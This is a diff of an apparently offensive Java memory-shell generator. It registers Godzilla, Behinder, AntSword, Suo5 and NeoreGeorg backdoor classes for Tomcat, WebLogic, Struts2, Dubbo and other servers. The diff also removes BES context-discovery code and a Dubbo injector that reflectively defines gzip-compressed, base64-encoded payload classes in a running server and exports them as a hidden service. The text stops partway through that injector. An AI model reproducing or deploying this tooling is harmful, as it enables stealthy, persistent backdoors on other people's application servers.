static {
|
||||
register(Server.Tomcat, Tomcat::new);
|
||||
register(Server.Jetty, Jetty::new);
|
||||
register(Server.Jetty5, Jetty5::new);
|
||||
register(Server.Undertow, Undertow::new);
|
||||
register(Server.JBoss, Jboss::new);
|
||||
register(Server.Resin, Resin::new);
|
||||
register(Server.Resin2, Resin2::new);
|
||||
register(Server.WebLogic, WebLogic::new);
|
||||
register(Server.WebSphere, WebSphere::new);
|
||||
register(Server.GlassFish, GlassFish::new);
|
||||
@@ -48,7 +46,7 @@ public class ServerFactory {
|
||||
register(Server.SpringWebMvc, SpringWebMvc::new);
|
||||
register(Server.SpringWebFlux, SpringWebFlux::new);
|
||||
register(Server.XXLJOB, XxlJob::new);
|
||||
register(Server.Struts2, Struts2::new);
|
||||
register(Server.Struct2, Struct2::new);
|
||||
register(Server.Dubbo, Dubbo::new);
|
||||
|
||||
addToolMapping(ShellTool.Godzilla, ToolMapping.builder()
|
||||
@@ -84,9 +82,7 @@ public class ServerFactory {
|
||||
.addShellClass(UNDERTOW_AGENT_SERVLET_HANDLER, GodzillaUndertowServletHandler.class)
|
||||
.addShellClass(WEBLOGIC_AGENT_SERVLET_CONTEXT, Godzilla.class)
|
||||
.addShellClass(WAS_AGENT_FILTER_MANAGER, Godzilla.class)
|
||||
.addShellClass(ACTION, GodzillaStruts2Action.class)
|
||||
.addShellClass(ALIBABA_DUBBO_SERVICE, GodzillaDubboService.class)
|
||||
.addShellClass(APACHE_DUBBO_SERVICE, GodzillaDubboService.class)
|
||||
.addShellClass(ACTION, GodzillaStruct2Action.class)
|
||||
.build());
|
||||
|
||||
addToolMapping(ShellTool.Behinder, ToolMapping.builder()
|
||||
@@ -111,7 +107,7 @@ public class ServerFactory {
|
||||
.addShellClass(UNDERTOW_AGENT_SERVLET_HANDLER, BehinderUndertowServletHandler.class)
|
||||
.addShellClass(WEBLOGIC_AGENT_SERVLET_CONTEXT, Behinder.class)
|
||||
.addShellClass(WAS_AGENT_FILTER_MANAGER, Behinder.class)
|
||||
.addShellClass(ACTION, BehinderStruts2Action.class)
|
||||
.addShellClass(ACTION, BehinderStruct2Action.class)
|
||||
.build());
|
||||
|
||||
addToolMapping(ShellTool.AntSword, ToolMapping.builder()
|
||||
@@ -129,7 +125,7 @@ public class ServerFactory {
|
||||
.addShellClass(UNDERTOW_AGENT_SERVLET_HANDLER, AntSwordUndertowServletHandler.class)
|
||||
.addShellClass(WEBLOGIC_AGENT_SERVLET_CONTEXT, AntSword.class)
|
||||
.addShellClass(WAS_AGENT_FILTER_MANAGER, AntSword.class)
|
||||
.addShellClass(ACTION, AntSwordStruts2Action.class)
|
||||
.addShellClass(ACTION, AntSwordStruct2Action.class)
|
||||
.build());
|
||||
|
||||
addToolMapping(ShellTool.Command, ToolMapping.builder()
|
||||
@@ -166,9 +162,8 @@ public class ServerFactory {
|
||||
.addShellClass(UNDERTOW_AGENT_SERVLET_HANDLER, CommandUndertowServletHandler.class)
|
||||
.addShellClass(WEBLOGIC_AGENT_SERVLET_CONTEXT, Command.class)
|
||||
.addShellClass(WAS_AGENT_FILTER_MANAGER, Command.class)
|
||||
.addShellClass(ACTION, CommandStruts2Action.class)
|
||||
.addShellClass(ALIBABA_DUBBO_SERVICE, CommandDubboService.class)
|
||||
.addShellClass(APACHE_DUBBO_SERVICE, CommandDubboService.class)
|
||||
.addShellClass(ACTION, CommandStruct2Action.class)
|
||||
.addShellClass(DUBBO_SERVICE, CommandDubboService.class)
|
||||
.build());
|
||||
|
||||
addToolMapping(ShellTool.Suo5, ToolMapping.builder()
|
||||
@@ -194,7 +189,7 @@ public class ServerFactory {
|
||||
.addShellClass(UNDERTOW_AGENT_SERVLET_HANDLER, Suo5UndertowServletHandler.class)
|
||||
.addShellClass(WEBLOGIC_AGENT_SERVLET_CONTEXT, Suo5.class)
|
||||
.addShellClass(WAS_AGENT_FILTER_MANAGER, Suo5.class)
|
||||
.addShellClass(ACTION, Suo5Struts2Action.class)
|
||||
.addShellClass(ACTION, Suo5Struct2Action.class)
|
||||
.build());
|
||||
|
||||
addToolMapping(ShellTool.Suo5v2, ToolMapping.builder()
|
||||
@@ -219,7 +214,7 @@ public class ServerFactory {
|
||||
.addShellClass(UNDERTOW_AGENT_SERVLET_HANDLER, Suo5v2UndertowServletHandler.class)
|
||||
.addShellClass(WEBLOGIC_AGENT_SERVLET_CONTEXT, Suo5v2.class)
|
||||
.addShellClass(WAS_AGENT_FILTER_MANAGER, Suo5v2.class)
|
||||
.addShellClass(ACTION, Suo5v2Struts2Action.class)
|
||||
.addShellClass(ACTION, Suo5v2Struct2Action.class)
|
||||
.addShellClass(CUSTOMIZER, Suo5v2JettyCustomizer.class)
|
||||
.build());
|
||||
|
||||
@@ -245,7 +240,7 @@ public class ServerFactory {
|
||||
.addShellClass(UNDERTOW_AGENT_SERVLET_HANDLER, NeoreGeorgUndertowServletHandler.class)
|
||||
.addShellClass(WEBLOGIC_AGENT_SERVLET_CONTEXT, NeoreGeorg.class)
|
||||
.addShellClass(WAS_AGENT_FILTER_MANAGER, NeoreGeorg.class)
|
||||
.addShellClass(ACTION, NeoreGeorgStruts2Action.class)
|
||||
.addShellClass(ACTION, NeoreGeorgStruct2Action.class)
|
||||
.build());
|
||||
|
||||
addToolMapping(ShellTool.Proxy, ToolMapping.builder()
|
||||
|
||||
@@ -7,14 +7,12 @@ package com.reajason.javaweb.memshell;
|
||||
public class ServerType {
|
||||
public static final String TOMCAT = "Tomcat";
|
||||
public static final String JETTY = "Jetty";
|
||||
public static final String JETTY5 = "Jetty5";
|
||||
public static final String JBOSS_AS = "JBossAS";
|
||||
public static final String JBOSS_EAP6 = "JBossEAP6";
|
||||
public static final String UNDERTOW = "Undertow";
|
||||
public static final String JBOSS_EAP7 = "JBossEAP7";
|
||||
public static final String WILDFLY = "Wildfly";
|
||||
public static final String RESIN = "Resin";
|
||||
public static final String RESIN2 = "Resin2";
|
||||
public static final String GLASSFISH = "Glassfish";
|
||||
public static final String PAYARA = "Payara";
|
||||
public static final String WEBLOGIC = "WebLogic";
|
||||
|
||||
@@ -49,9 +49,7 @@ public class ShellType {
|
||||
public static final String JAKARTA_WEBSOCKET = "JakartaWebSocket";
|
||||
public static final String JAKARTA_BYPASS_NGINX_WEBSOCKET = "JakartaWebBypassNginx" + WEBSOCKET;
|
||||
|
||||
public static final String ACTION = "Action";
|
||||
|
||||
public static final String DUBBO_SERVICE = "DubboService";
|
||||
public static final String APACHE_DUBBO_SERVICE = "Apache" + DUBBO_SERVICE;
|
||||
public static final String ALIBABA_DUBBO_SERVICE = "Alibaba" + DUBBO_SERVICE;
|
||||
|
||||
public static final String ACTION = "Action";
|
||||
}
|
||||
|
||||
@@ -91,15 +91,12 @@ public class CommandConfig extends ShellToolConfig {
|
||||
}
|
||||
|
||||
public enum Encryptor {
|
||||
RAW, BASE64, DOUBLE_BASE64;
|
||||
RAW, DOUBLE_BASE64;
|
||||
|
||||
public static Encryptor fromString(String encryptor) {
|
||||
if (encryptor != null && encryptor.equals("DOUBLE_BASE64")) {
|
||||
return DOUBLE_BASE64;
|
||||
}
|
||||
if (encryptor != null && encryptor.equals("BASE64")) {
|
||||
return BASE64;
|
||||
}
|
||||
return RAW;
|
||||
}
|
||||
}
|
||||
|
||||
@@ -27,12 +27,6 @@ public class InjectorConfig {
|
||||
@Builder.Default
|
||||
private String injectorClassName = CommonUtil.generateInjectorClassName();
|
||||
|
||||
/**
|
||||
* 辅助类类名
|
||||
*/
|
||||
private String injectorHelperClassName;
|
||||
|
||||
|
||||
/**
|
||||
* 注入访问的地址
|
||||
*/
|
||||
@@ -49,6 +43,11 @@ public class InjectorConfig {
|
||||
*/
|
||||
private byte[] shellClassBytes;
|
||||
|
||||
/**
|
||||
* 辅助类类名
|
||||
*/
|
||||
private String injectorHelperClassName;
|
||||
|
||||
/**
|
||||
* 辅助类字节码
|
||||
*/
|
||||
|
||||
+1
-5
@@ -23,10 +23,6 @@ public abstract class ByteBuddyShellGenerator<T extends ShellToolConfig> impleme
|
||||
|
||||
protected abstract DynamicType.Builder<?> getBuilder();
|
||||
|
||||
protected int getTargetJreVersion() {
|
||||
return shellConfig.getTargetJreVersion();
|
||||
}
|
||||
|
||||
protected byte[] postProcessBytes(byte[] classBytes) {
|
||||
return classBytes;
|
||||
}
|
||||
@@ -47,7 +43,7 @@ public abstract class ByteBuddyShellGenerator<T extends ShellToolConfig> impleme
|
||||
|
||||
builder = ProcessorRegistry.applyBuilderProcessors(builder, shellConfig, shellToolConfig)
|
||||
.name(shellClassName)
|
||||
.visit(new TargetJreVersionVisitorWrapper(getTargetJreVersion()));
|
||||
.visit(new TargetJreVersionVisitorWrapper(shellConfig.getTargetJreVersion()));
|
||||
|
||||
try (DynamicType.Unloaded<?> unloaded = builder.make()) {
|
||||
byte[] bytes = postProcessBytes(unloaded.getBytes());
|
||||
|
||||
-40
@@ -7,10 +7,6 @@ import net.bytebuddy.description.type.TypeDescription;
|
||||
import net.bytebuddy.dynamic.ClassFileLocator;
|
||||
import net.bytebuddy.dynamic.DynamicType;
|
||||
import net.bytebuddy.jar.asm.ClassReader;
|
||||
import net.bytebuddy.jar.asm.ClassVisitor;
|
||||
import net.bytebuddy.jar.asm.Label;
|
||||
import net.bytebuddy.jar.asm.MethodVisitor;
|
||||
import net.bytebuddy.jar.asm.Opcodes;
|
||||
import net.bytebuddy.pool.TypePool;
|
||||
import org.apache.commons.lang3.StringUtils;
|
||||
|
||||
@@ -21,7 +17,6 @@ import java.util.Base64;
|
||||
* @since 2025/3/18
|
||||
*/
|
||||
public class CustomShellGenerator extends ByteBuddyShellGenerator<CustomConfig> {
|
||||
private boolean containsSubroutines;
|
||||
|
||||
public CustomShellGenerator(ShellConfig shellConfig, CustomConfig customConfig) {
|
||||
super(shellConfig, customConfig);
|
||||
@@ -32,7 +27,6 @@ public class CustomShellGenerator extends ByteBuddyShellGenerator<CustomConfig>
|
||||
String shellClassBase64 = shellToolConfig.getShellClassBase64();
|
||||
byte[] classBytes = Base64.getDecoder().decode(shellClassBase64);
|
||||
ClassReader classReader = new ClassReader(classBytes);
|
||||
containsSubroutines = containsSubroutines(classReader);
|
||||
String className = classReader.getClassName().replace('/', '.');
|
||||
if (StringUtils.isBlank(shellToolConfig.getShellClassName())) {
|
||||
shellToolConfig.setShellClassName(className);
|
||||
@@ -49,38 +43,4 @@ public class CustomShellGenerator extends ByteBuddyShellGenerator<CustomConfig>
|
||||
return new ByteBuddy()
|
||||
.redefine(typeDescription, compoundLocator);
|
||||
}
|
||||
|
||||
@Override
|
||||
protected int getTargetJreVersion() {
|
||||
// Byte Buddy cannot emit a class version newer than Java 5 when the
|
||||
// source bytecode contains legacy jsr/ret subroutines. Keep such
|
||||
// custom classes at Java 5; Java 6+ runtimes can load them as well.
|
||||
return containsSubroutines ? Opcodes.V1_5 : super.getTargetJreVersion();
|
||||
}
|
||||
|
||||
private static boolean containsSubroutines(ClassReader classReader) {
|
||||
final boolean[] found = {false};
|
||||
classReader.accept(new ClassVisitor(Opcodes.ASM9) {
|
||||
@Override
|
||||
public MethodVisitor visitMethod(int access, String name, String descriptor,
|
||||
String signature, String[] exceptions) {
|
||||
return new MethodVisitor(Opcodes.ASM9) {
|
||||
@Override
|
||||
public void visitJumpInsn(int opcode, Label label) {
|
||||
if (opcode == Opcodes.JSR) {
|
||||
found[0] = true;
|
||||
}
|
||||
}
|
||||
|
||||
@Override
|
||||
public void visitVarInsn(int opcode, int var) {
|
||||
if (opcode == Opcodes.RET) {
|
||||
found[0] = true;
|
||||
}
|
||||
}
|
||||
};
|
||||
}
|
||||
}, ClassReader.SKIP_DEBUG | ClassReader.SKIP_FRAMES);
|
||||
return found[0];
|
||||
}
|
||||
}
|
||||
|
||||
-16
@@ -1,16 +0,0 @@
|
||||
package com.reajason.javaweb.memshell.generator.command;
|
||||
|
||||
import com.reajason.javaweb.utils.ShellCommonUtil;
|
||||
import net.bytebuddy.asm.Advice;
|
||||
|
||||
/**
|
||||
* @author ReaJason
|
||||
* @since 2025/4/27
|
||||
*/
|
||||
public class Base64ParamInterceptor {
|
||||
|
||||
@Advice.OnMethodExit
|
||||
public static void enter(@Advice.Argument(value = 0) String param, @Advice.Return(readOnly = false) String returnValue) throws Exception {
|
||||
returnValue = ShellCommonUtil.base64DecodeToString(param);
|
||||
}
|
||||
}
|
||||
+1
-11
@@ -1,6 +1,7 @@
|
||||
package com.reajason.javaweb.memshell.generator.command;
|
||||
|
||||
import com.reajason.javaweb.buddy.MethodCallReplaceVisitorWrapper;
|
||||
import com.reajason.javaweb.memshell.ShellType;
|
||||
import com.reajason.javaweb.memshell.config.CommandConfig;
|
||||
import com.reajason.javaweb.memshell.config.ShellConfig;
|
||||
import com.reajason.javaweb.memshell.generator.ByteBuddyShellGenerator;
|
||||
@@ -42,17 +43,6 @@ public class CommandGenerator extends ByteBuddyShellGenerator<CommandConfig> {
|
||||
.visit(Advice.to(ShellCommonUtil.Base64DecodeToStringInterceptor.class).on(named("base64DecodeToString")))
|
||||
.visit(Advice.to(DoubleBase64ParamInterceptor.class).on(named("getParam")));
|
||||
}
|
||||
if (CommandConfig.Encryptor.BASE64.equals(shellToolConfig.getEncryptor())) {
|
||||
builder = builder
|
||||
.visit(MethodCallReplaceVisitorWrapper.newInstance("getParam",
|
||||
shellToolConfig.getShellClassName(), ShellCommonUtil.class.getName()))
|
||||
.defineMethod("base64DecodeToString", String.class, Visibility.PUBLIC, Ownership.STATIC)
|
||||
.withParameters(String.class)
|
||||
.throwing(Exception.class)
|
||||
.intercept(FixedValue.nullValue())
|
||||
.visit(Advice.to(ShellCommonUtil.Base64DecodeToStringInterceptor.class).on(named("base64DecodeToString")))
|
||||
.visit(Advice.to(Base64ParamInterceptor.class).on(named("getParam")));
|
||||
}
|
||||
if (CommandConfig.ImplementationClass.RuntimeExec.equals(shellToolConfig.getImplementationClass())) {
|
||||
builder = builder.visit(Advice.withCustomMapping()
|
||||
.bind(TemplateAnnotation.class, shellToolConfig.getTemplate())
|
||||
|
||||
+2
-6
@@ -45,7 +45,6 @@ public class ValveBuilderModifier implements Processor<DynamicType.Builder<?>> {
|
||||
public static final String TONGWEB6_VALVE_PACKAGE = "com.tongweb.web.thor";
|
||||
public static final String TONGWEB7_VALVE_PACKAGE = "com.tongweb.catalina";
|
||||
public static final String TONGWEB8_VALVE_PACKAGE = "com.tongweb.server";
|
||||
public static final String TONGWEB_EMBEDDED_VALVE_PACKAGE = "com.tongweb.container";
|
||||
|
||||
public static DynamicType.Builder<?> modifier(DynamicType.Builder<?> builder, AbstractServer shell, String serverVersion) {
|
||||
String packageName = null;
|
||||
@@ -54,7 +53,7 @@ public class ValveBuilderModifier implements Processor<DynamicType.Builder<?>> {
|
||||
}
|
||||
if (shell instanceof TongWeb) {
|
||||
if (serverVersion == null) {
|
||||
throw new GenerationException("serverVersion is needed for TongWeb Valve, please use one of ['6', '7', '8', '7.E'] for shellConfig.serverVersion");
|
||||
throw new GenerationException("serverVersion is needed for TongWeb Valve, please use one of ['6', '7', '8'] for shellConfig.serverVersion");
|
||||
}
|
||||
switch (serverVersion) {
|
||||
case "6":
|
||||
@@ -66,11 +65,8 @@ public class ValveBuilderModifier implements Processor<DynamicType.Builder<?>> {
|
||||
case "8":
|
||||
packageName = TONGWEB8_VALVE_PACKAGE;
|
||||
break;
|
||||
case "7.E":
|
||||
packageName = TONGWEB_EMBEDDED_VALVE_PACKAGE;
|
||||
break;
|
||||
default:
|
||||
throw new GenerationException("TongWeb Valve unknow serverVersion: [" + serverVersion + "], please use one of ['6', '7', '8', '7.E'] for shellConfig.serverVersion");
|
||||
throw new GenerationException("TongWeb Valve unknow serverVersion: [" + serverVersion + "], please use one of ['6', '7', '8'] for shellConfig.serverVersion");
|
||||
}
|
||||
}
|
||||
if (StringUtils.isNotBlank(packageName)) {
|
||||
|
||||
+4
-21
@@ -85,27 +85,10 @@ public class BesFilterInjector {
|
||||
for (Thread thread : threads) {
|
||||
if (thread.getName().contains("ContainerBackgroundProcessor")) {
|
||||
Map<?, ?> childrenMap = (Map<?, ?>) getFieldValue(getFieldValue(getFieldValue(thread, "target"), "this$0"), "children");
|
||||
for (Object value : childrenMap.values()) {
|
||||
contexts.addAll(((Map<?, ?>) getFieldValue(value, "children")).values());
|
||||
}
|
||||
} else if (thread.getName().contains("AppServer-utility")) {
|
||||
// BES 10 / BES 11: AppServer-utility thread fallback.
|
||||
// BES 11 target has a wrappedRunnable field; BES 10 does not — try/catch handles both.
|
||||
Object target = getFieldValue(thread, "target");
|
||||
try {
|
||||
target = getFieldValue(target, "wrappedRunnable");
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
Iterable<?> workQueue = (Iterable<?>) getFieldValue(getFieldValue(target, "this$0"), "workQueue");
|
||||
for (Object task : workQueue) {
|
||||
Object runnable = getFieldValue(getFieldValue(task, "callable"), "task");
|
||||
if (!runnable.getClass().getSimpleName().contains("ContainerBackgroundProcessor")) {
|
||||
continue;
|
||||
}
|
||||
Map<?, ?> childrenMap = (Map<?, ?>) getFieldValue(getFieldValue(runnable, "this$0"), "children");
|
||||
for (Object host : childrenMap.values()) {
|
||||
contexts.addAll(((Map<?, ?>) getFieldValue(host, "children")).values());
|
||||
}
|
||||
Collection<?> values = childrenMap.values();
|
||||
for (Object value : values) {
|
||||
Map<?, ?> children = (Map<?, ?>) getFieldValue(value, "children");
|
||||
contexts.addAll(children.values());
|
||||
}
|
||||
} else if (thread.getContextClassLoader() != null) {
|
||||
String name = thread.getContextClassLoader().getClass().getSimpleName();
|
||||
|
||||
+4
-21
@@ -77,27 +77,10 @@ public class BesListenerInjector {
|
||||
for (Thread thread : threads) {
|
||||
if (thread.getName().contains("ContainerBackgroundProcessor")) {
|
||||
Map<?, ?> childrenMap = (Map<?, ?>) getFieldValue(getFieldValue(getFieldValue(thread, "target"), "this$0"), "children");
|
||||
for (Object value : childrenMap.values()) {
|
||||
contexts.addAll(((Map<?, ?>) getFieldValue(value, "children")).values());
|
||||
}
|
||||
} else if (thread.getName().contains("AppServer-utility")) {
|
||||
// BES 10 / BES 11: AppServer-utility thread fallback.
|
||||
// BES 11 target has a wrappedRunnable field; BES 10 does not — try/catch handles both.
|
||||
Object target = getFieldValue(thread, "target");
|
||||
try {
|
||||
target = getFieldValue(target, "wrappedRunnable");
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
Iterable<?> workQueue = (Iterable<?>) getFieldValue(getFieldValue(target, "this$0"), "workQueue");
|
||||
for (Object task : workQueue) {
|
||||
Object runnable = getFieldValue(getFieldValue(task, "callable"), "task");
|
||||
if (!runnable.getClass().getSimpleName().contains("ContainerBackgroundProcessor")) {
|
||||
continue;
|
||||
}
|
||||
Map<?, ?> childrenMap = (Map<?, ?>) getFieldValue(getFieldValue(runnable, "this$0"), "children");
|
||||
for (Object host : childrenMap.values()) {
|
||||
contexts.addAll(((Map<?, ?>) getFieldValue(host, "children")).values());
|
||||
}
|
||||
Collection<?> values = childrenMap.values();
|
||||
for (Object value : values) {
|
||||
Map<?, ?> children = (Map<?, ?>) getFieldValue(value, "children");
|
||||
contexts.addAll(children.values());
|
||||
}
|
||||
} else if (thread.getContextClassLoader() != null) {
|
||||
String name = thread.getContextClassLoader().getClass().getSimpleName();
|
||||
|
||||
+4
-21
@@ -76,27 +76,10 @@ public class BesValveInjector {
|
||||
for (Thread thread : threads) {
|
||||
if (thread.getName().contains("ContainerBackgroundProcessor")) {
|
||||
Map<?, ?> childrenMap = (Map<?, ?>) getFieldValue(getFieldValue(getFieldValue(thread, "target"), "this$0"), "children");
|
||||
for (Object value : childrenMap.values()) {
|
||||
contexts.addAll(((Map<?, ?>) getFieldValue(value, "children")).values());
|
||||
}
|
||||
} else if (thread.getName().contains("AppServer-utility")) {
|
||||
// BES 10 / BES 11: AppServer-utility thread fallback.
|
||||
// BES 11 target has a wrappedRunnable field; BES 10 does not — try/catch handles both.
|
||||
Object target = getFieldValue(thread, "target");
|
||||
try {
|
||||
target = getFieldValue(target, "wrappedRunnable");
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
Iterable<?> workQueue = (Iterable<?>) getFieldValue(getFieldValue(target, "this$0"), "workQueue");
|
||||
for (Object task : workQueue) {
|
||||
Object runnable = getFieldValue(getFieldValue(task, "callable"), "task");
|
||||
if (!runnable.getClass().getSimpleName().contains("ContainerBackgroundProcessor")) {
|
||||
continue;
|
||||
}
|
||||
Map<?, ?> childrenMap = (Map<?, ?>) getFieldValue(getFieldValue(runnable, "this$0"), "children");
|
||||
for (Object host : childrenMap.values()) {
|
||||
contexts.addAll(((Map<?, ?>) getFieldValue(host, "children")).values());
|
||||
}
|
||||
Collection<?> values = childrenMap.values();
|
||||
for (Object value : values) {
|
||||
Map<?, ?> children = (Map<?, ?>) getFieldValue(value, "children");
|
||||
contexts.addAll(children.values());
|
||||
}
|
||||
} else if (thread.getContextClassLoader() != null) {
|
||||
String name = thread.getContextClassLoader().getClass().getSimpleName();
|
||||
|
||||
-451
@@ -1,451 +0,0 @@
|
||||
package com.reajason.javaweb.memshell.injector.dubbo;
|
||||
|
||||
import com.alibaba.dubbo.common.URL;
|
||||
import com.alibaba.dubbo.common.bytecode.ClassGenerator;
|
||||
import com.alibaba.dubbo.common.utils.ClassHelper;
|
||||
import com.alibaba.dubbo.config.*;
|
||||
import com.alibaba.dubbo.config.model.ApplicationModel;
|
||||
import com.alibaba.dubbo.config.model.ProviderModel;
|
||||
import javassist.ClassPool;
|
||||
|
||||
import java.io.ByteArrayInputStream;
|
||||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.PrintWriter;
|
||||
import java.io.StringWriter;
|
||||
import java.lang.reflect.Constructor;
|
||||
import java.lang.reflect.Method;
|
||||
import java.lang.reflect.Modifier;
|
||||
import java.security.ProtectionDomain;
|
||||
import java.util.ArrayList;
|
||||
import java.util.LinkedHashMap;
|
||||
import java.util.List;
|
||||
import java.util.Map;
|
||||
import java.util.concurrent.ConcurrentHashMap;
|
||||
import java.util.zip.GZIPInputStream;
|
||||
|
||||
public class AlibabaDubboServiceInjector {
|
||||
private final Map<String, ServiceConfig<?>> dynamicServices = new ConcurrentHashMap<>();
|
||||
private static final String DISPLAY_HOST = "x.x.x.x";
|
||||
private static String msg = "";
|
||||
private static boolean ok = false;
|
||||
|
||||
public String getUrlPattern() {
|
||||
return "{{urlPattern}}";
|
||||
}
|
||||
|
||||
public String getClassName() {
|
||||
return "{{className}}";
|
||||
}
|
||||
|
||||
public String getBase64String() {
|
||||
return "{{base64Str}}";
|
||||
}
|
||||
|
||||
public String getHelperBase64String() {
|
||||
return "{{helperBase64String}}";
|
||||
}
|
||||
|
||||
public AlibabaDubboServiceInjector() {
|
||||
if (ok) {
|
||||
return;
|
||||
}
|
||||
try {
|
||||
msg += registerService();
|
||||
} catch (Throwable e) {
|
||||
msg += "unexcepted error: " + stackTrace(e);
|
||||
}
|
||||
ok = true;
|
||||
System.out.println(msg);
|
||||
}
|
||||
|
||||
public String registerService() throws Exception {
|
||||
String servicePath = normalizePath(getUrlPattern());
|
||||
if (servicePath.isEmpty()) {
|
||||
throw new IllegalArgumentException("path must not be empty");
|
||||
}
|
||||
|
||||
if (dynamicServices.containsKey(servicePath) || findRegisteredService(servicePath) != null) {
|
||||
return resolveServiceAddresses(servicePath);
|
||||
}
|
||||
|
||||
Class<?> serviceInterface = loadClass(getHelperBase64String());
|
||||
Class<?> serviceImpl = loadClass(getBase64String());
|
||||
validateServiceTypes(serviceInterface, serviceImpl);
|
||||
|
||||
ServiceConfig<?> serviceConfig = createServiceConfig(servicePath, serviceInterface, instantiate(serviceImpl));
|
||||
if (dynamicServices.putIfAbsent(servicePath, serviceConfig) != null) {
|
||||
return resolveServiceAddresses(servicePath);
|
||||
}
|
||||
|
||||
try {
|
||||
serviceConfig.export();
|
||||
return resolveServiceAddresses(servicePath);
|
||||
} catch (RuntimeException e) {
|
||||
dynamicServices.remove(servicePath, serviceConfig);
|
||||
throw e;
|
||||
}
|
||||
}
|
||||
|
||||
private Class<?> loadClass(String payload) throws Exception {
|
||||
ClassLoader classLoader = ClassHelper.getClassLoader(ClassGenerator.class);
|
||||
byte[] classBytes = gzipDecompress(decodeBase64(payload));
|
||||
definePackageIfNeeded(classLoader, getClassName());
|
||||
Class<?> loadedClass = defineClass(classLoader, classBytes);
|
||||
registerInJavassistClassPool(classLoader, classBytes);
|
||||
return loadedClass;
|
||||
}
|
||||
|
||||
private Class<?> defineClass(ClassLoader classLoader, byte[] classBytes) throws Exception {
|
||||
ProtectionDomain protectionDomain = ClassGenerator.class.getProtectionDomain();
|
||||
Method defineClass = ClassLoader.class.getDeclaredMethod(
|
||||
"defineClass",
|
||||
String.class,
|
||||
byte[].class,
|
||||
int.class,
|
||||
int.class,
|
||||
ProtectionDomain.class
|
||||
);
|
||||
defineClass.setAccessible(true);
|
||||
return (Class<?>) defineClass.invoke(classLoader, null, classBytes, 0, classBytes.length, protectionDomain);
|
||||
}
|
||||
|
||||
private void definePackageIfNeeded(ClassLoader classLoader, String className) {
|
||||
int packageEnd = className.lastIndexOf('.');
|
||||
if (packageEnd < 0) {
|
||||
return;
|
||||
}
|
||||
|
||||
String packageName = className.substring(0, packageEnd);
|
||||
try {
|
||||
Method getPackage = ClassLoader.class.getDeclaredMethod("getPackage", String.class);
|
||||
getPackage.setAccessible(true);
|
||||
if (getPackage.invoke(classLoader, packageName) != null) {
|
||||
return;
|
||||
}
|
||||
|
||||
Method definePackage = ClassLoader.class.getDeclaredMethod(
|
||||
"definePackage",
|
||||
String.class,
|
||||
String.class,
|
||||
String.class,
|
||||
String.class,
|
||||
String.class,
|
||||
String.class,
|
||||
String.class,
|
||||
java.net.URL.class
|
||||
);
|
||||
definePackage.setAccessible(true);
|
||||
definePackage.invoke(classLoader, packageName, null, null, null, null, null, null, null);
|
||||
} catch (Exception ignored) {
|
||||
// Defining the package is a convenience for older class loaders. The class can still load without it.
|
||||
}
|
||||
}
|
||||
|
||||
private void registerInJavassistClassPool(ClassLoader classLoader, byte[] classBytes) {
|
||||
try {
|
||||
ClassPool classPool = ClassGenerator.getClassPool(classLoader);
|
||||
classPool.makeClass(new ByteArrayInputStream(classBytes));
|
||||
} catch (Throwable ignored) {
|
||||
// Dubbo's proxy generator can still resolve already-defined classes if Javassist registration fails.
|
||||
}
|
||||
}
|
||||
|
||||
private static byte[] decodeBase64(String value) throws Exception {
|
||||
Object decoder = Class.forName("sun.misc.BASE64Decoder").newInstance();
|
||||
return (byte[]) decoder.getClass().getMethod("decodeBuffer", String.class).invoke(decoder, value);
|
||||
}
|
||||
|
||||
private static byte[] gzipDecompress(byte[] bytes) throws Exception {
|
||||
GZIPInputStream inputStream = null;
|
||||
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
|
||||
try {
|
||||
inputStream = new GZIPInputStream(new ByteArrayInputStream(bytes));
|
||||
byte[] buffer = new byte[4096];
|
||||
int read;
|
||||
while ((read = inputStream.read(buffer)) > 0) {
|
||||
outputStream.write(buffer, 0, read);
|
||||
}
|
||||
return outputStream.toByteArray();
|
||||
} finally {
|
||||
if (inputStream != null) {
|
||||
inputStream.close();
|
||||
}
|
||||
outputStream.close();
|
||||
}
|
||||
}
|
||||
|
||||
private void validateServiceTypes(Class<?> serviceInterface, Class<?> serviceImpl) {
|
||||
if (!serviceInterface.isInterface()) {
|
||||
throw new IllegalArgumentException("not an interface: " + serviceInterface.getName());
|
||||
}
|
||||
if (serviceImpl.isInterface() || Modifier.isAbstract(serviceImpl.getModifiers())) {
|
||||
throw new IllegalArgumentException("implementation class is not instantiable: " + serviceImpl.getName());
|
||||
}
|
||||
if (!serviceInterface.isAssignableFrom(serviceImpl)) {
|
||||
throw new IllegalArgumentException(serviceImpl.getName() + " does not implement " + serviceInterface.getName());
|
||||
}
|
||||
}
|
||||
|
||||
private Object instantiate(Class<?> serviceImpl) {
|
||||
try {
|
||||
Constructor<?> constructor = serviceImpl.getDeclaredConstructor();
|
||||
constructor.setAccessible(true);
|
||||
return constructor.newInstance();
|
||||
} catch (Exception e) {
|
||||
throw new IllegalArgumentException("failed to instantiate " + serviceImpl.getName(), e);
|
||||
}
|
||||
}
|
||||
|
||||
private ServiceConfig<Object> createServiceConfig(String servicePath, Class<?> serviceInterface, Object serviceImpl) {
|
||||
ServiceConfig<Object> serviceConfig = new ServiceConfig<Object>();
|
||||
serviceConfig.setInterface(serviceInterface);
|
||||
serviceConfig.setRef(serviceImpl);
|
||||
serviceConfig.setPath(servicePath);
|
||||
|
||||
ProviderConfig providerConfig = findProviderConfig();
|
||||
if (providerConfig != null) {
|
||||
serviceConfig.setProvider(providerConfig);
|
||||
if (notEmpty(providerConfig.getVersion())) {
|
||||
serviceConfig.setVersion(providerConfig.getVersion());
|
||||
}
|
||||
}
|
||||
|
||||
ApplicationConfig applicationConfig = findApplicationConfig(providerConfig);
|
||||
if (applicationConfig != null) {
|
||||
serviceConfig.setApplication(applicationConfig);
|
||||
}
|
||||
|
||||
List<ProtocolConfig> protocolConfigs = findProtocolConfigs(providerConfig);
|
||||
if (!protocolConfigs.isEmpty()) {
|
||||
serviceConfig.setProtocols(protocolConfigs);
|
||||
}
|
||||
|
||||
List<RegistryConfig> registryConfigs = findRegistryConfigs(providerConfig, applicationConfig);
|
||||
if (!registryConfigs.isEmpty()) {
|
||||
serviceConfig.setRegistries(registryConfigs);
|
||||
}
|
||||
|
||||
return serviceConfig;
|
||||
}
|
||||
|
||||
private ServiceConfig<?> findRegisteredService(String servicePath) {
|
||||
String normalizedPath = normalizePath(servicePath);
|
||||
for (ProviderModel providerModel : providerModels()) {
|
||||
